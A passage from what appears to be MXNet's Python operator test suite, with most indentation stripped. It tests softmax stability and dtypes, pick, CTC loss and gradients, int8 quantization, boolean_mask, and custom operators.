exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
nparr = ndarr.asnumpy()
assert_almost_equal(nparr, true_output, rtol=1e-5, atol=1e-5)
    softmax_forward(mx.nd.array([[[[-1e30, -1e30]]]]), np.array([1.0, 1.0]))
    softmax_forward(mx.nd.array([[[[1e30, 1e30]]]]), np.array([1.0, 1.0]))
    softmax_forward(mx.nd.array([[[[-3.4e38, -3.4e38]]]]), np.array([1.0, 1.0]))
    softmax_forward(mx.nd.array([[[[3.4e38, 3.4e38]]]]), np.array([1.0, 1.0]))
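# Sketch (an assumption about the implementation detail): one standard way to
# keep softmax finite for magnitudes like 1e30 or 3.4e38 is to subtract the
# row maximum before exponentiating, since softmax(x) == softmax(x - max(x)).
def _demo_stable_softmax():
    x = np.array([1e30, 1e30], dtype=np.float64)
    z = np.exp(x - x.max())            # exp(0) == 1, no overflow
    assert np.allclose(z / z.sum(), [0.5, 0.5])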
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
dtype_softmax_np = dtype_softmax.asnumpy()
ref_softmax_np = ref_softmax.asnumpy()
assert_almost_equal(dtype_softmax_np, ref_softmax_np, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
dtype_grad_np = dtype_input.grad.asnumpy()
ref_grad_np = ref_input.grad.asnumpy()
assert_almost_equal(dtype_grad_np, ref_grad_np, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)], rtol=1e-2, atol=1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
            expected = data[tuple(exp)]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
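# Sketch (not invoked by the test runner): pick selects one element per slice
# along `axis` according to the index array.
def _demo_pick():
    data = mx.nd.array([[1, 2], [3, 4], [5, 6]])
    index = mx.nd.array([0, 1, 0])
    picked = mx.nd.pick(data, index, axis=1)
    assert same(picked.asnumpy(), np.array([1, 4, 5], dtype=np.float32))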
def check_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
check_ctc_loss(acts, labels, true_loss)
check_contrib_ctc_loss(acts, labels, true_loss)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels2, true_loss)
check_contrib_ctc_loss(acts2, labels2, true_loss)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels3, true_loss)
check_contrib_ctc_loss(acts2, labels3, true_loss)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
    for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
check_ctc_loss_grad('first')
check_ctc_loss_grad('last')
check_contrib_ctc_loss_grad('first')
check_contrib_ctc_loss_grad('last')
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
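# Sketch of the symmetric int8 mapping the expected values above encode
# (assumption: scale = 127 / max(|min0|, |max0|), rounded to nearest):
def _demo_int8_quantize_scale():
    scale = 127.0 / 1.0
    x = np.array([0.1392, 0.5928, 0.6027, 0.8579])
    q = np.round(x * scale)
    assert same(q, np.array([18.0, 75.0, 77.0, 109.0]))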
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
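# Sketch (not invoked by the test runner): boolean_mask keeps the leading-axis
# slices whose mask entry is nonzero.
def _demo_boolean_mask():
    d = mx.nd.array([[1, 2], [3, 4]])
    m = mx.nd.array([1, 0])
    out = mx.nd.contrib.boolean_mask(d, m)
    assert same(out.asnumpy(), np.array([[1, 2]], dtype=np.float32))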
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
